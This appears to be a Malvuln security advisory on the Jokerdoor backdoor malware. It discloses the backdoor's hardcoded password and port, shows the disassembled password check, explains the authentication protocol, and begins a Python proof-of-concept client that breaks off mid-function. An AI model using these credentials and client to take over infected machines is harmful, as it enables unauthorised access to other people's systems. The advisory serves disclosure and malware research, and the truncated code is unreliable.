Authored by malvuln | Site malvuln.com

Backdoor.Win32.Jokerdoor malware suffers from a hardcoded credential vulnerability.

Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/a6437375fff871dff97dc91c8fd6259f.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Jokerdoor
Vulnerability: Weak Hardcoded Credentials
Family: Jokerdoor
Type: PE32
MD5: a6437375fff871dff97dc91c8fd6259f
Vuln ID: MVID-2022-0531
Dropped files: Random name "awup.exe"
Disclosure: 04/02/2022
Description: The malware listens on TCP port 27374. The password "mathiasJ" is weak and hardcoded in the PE file. Failed authentication generates a "POPUP incorrect password..." message, using TELNET results in an error "PWDPerror reading password..." Using Nc64.exe utility results in a trailing line feed character "n" after the supplied password. This causes the cmp statement check to fail even if the password is correct due to the "n" character.

004BDA0C | 8B 45 EC | mov eax,dword ptr ss:[ebp-14] | [ebp-14]:" mathiasJn"
004BDA0F | 8B 15 0C AC 4D 00 | mov edx,dword ptr ds:[4DAC0C] | 004DAC0C:&"mathiasJ"
004041C7 | 39 D0 | cmp eax,edx | eax" mathiasJn", edx"mathiasJ"

So we will need to write a custom client ourselves. The password must also be sent with no space and prefixed with "PWD" E.g. "PWDmathiasJ". Upon successful authentication we get a message e.g. "PWDconnected time, date Legends 2.1".

Exploit/PoC:
from socket import *
import time

MALWARE_HOST="x.x.x.x"
PORT=27374

def chk_res(s):
res=""
while True:
res += s.recv(512)
break
if "